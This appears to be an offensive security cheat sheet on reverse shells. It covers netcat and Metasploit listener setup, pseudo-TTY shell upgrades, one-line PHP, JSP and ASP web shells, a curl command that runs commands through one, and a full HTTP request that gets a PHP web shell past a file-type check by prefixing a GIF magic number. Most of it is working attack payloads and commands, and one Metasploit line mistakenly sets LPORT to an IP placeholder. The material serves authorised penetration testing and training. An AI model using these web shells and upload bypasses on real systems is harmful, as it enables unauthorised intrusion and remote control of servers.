Reverse Shells

# **Basic Information** # **Setting up a Listener** ## **netcat** ```bash nc -lvnp <redir_port> rlwrap -r -f . nc -lvnp <redir_port> ``` ## **MSFConsole** ```bash msfconsole -qn use exploit/multi/handler set ExitOnSession false # for non-meterpreter callbacks (netcat listener) set PAYLOAD cmd/unix/reverse_netcat set PAYLOAD windows/shell_reverse_tcp set LHOST <redir_ip> set LPORT <redir_ip> run -zj ``` # **Upgrading to pseudo-TTY** ```bash # run in netcat shell python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' # background netcat shell [CTRL + z] echo $TERM && stty size stty raw -echo && fg [Enter] [Enter] # run in netcat shell export TERM=xterm-256color stty rows <num> columns <cols> ``` # **Web Shell** - If a file upload is possible, below is list of the default web roots for various web applications. | Web Server | Default Webroot | | ---------- | ------------------------ | | Apache | `/var/www/html/` | | Nginx | `/usr/local/nginx/html/` | | IIS | `c:\inetpub\wwwroot\` | | XAMPP | `C:\xampp\htdocs\` | Below is the most basic of web shells for PHP, JSP, and ASP. ```php <?php system($_REQUEST["cmd"]); ?> ``` ```jsp <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ``` ```asp <% eval request("cmd") %> ``` Run the following command to get code execution: ```bash curl http://target.com/rev.php?cmd=id ``` ### **File Type Bypass** - Using Burp Suite, upload a file type that is allowed and send that request to `Repeater`. Within `Repeater`, change the file name and contents to that of a web shell. Depending on the application, the file type can be bypassed by changing the following: - `Content-Type` - Change this to `image/png` , `text/plain` , `application/octet-stream`, etc. - Add the magic number of an allowed file type to the beginning of the file - Below is an example of how a request was modified to bypass file type checks by adding the magic number for GIFs (`GIF89a`) at the beginning of the file. ``` POST /ajax.php?action=upload_image HTTP/1.1 Host: 172.16.201.172 Content-Length: 216 X-Requested-With: XMLHttpRequest Accept-Language: en-GB,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye3aUbG86BHc72wcA Csrf-Token: 2ade53193a User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 Origin: http://172.16.201.172 Referer: http://172.16.201.172/ Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=itn4tm4uee93qkvftj88148g49 Connection: keep-alive ------WebKitFormBoundarye3aUbG86BHc72wcA Content-Disposition: form-data; name="file"; filename="rev.php" Content-Type: image/png GIF89a <?php system($_GET['cmd'])?> ------WebKitFormBoundarye3aUbG86BHc72wcA-- ``` # **References** - [Reverse Shell Generator](https://www.revshells.com/) - [Bypass File Type Check By Adding a Magic Number](https://book.hacktricks.wiki/en/pentesting-web/file-upload/index.html?highlight=file%20uplo#bypass-content-type-magic-number-compression--resizing) - [PayloadAllTheThings](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/) - [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/) # **Practical Application** | Platform | Name | Notes | | -------- | ---- | ----- | | | | |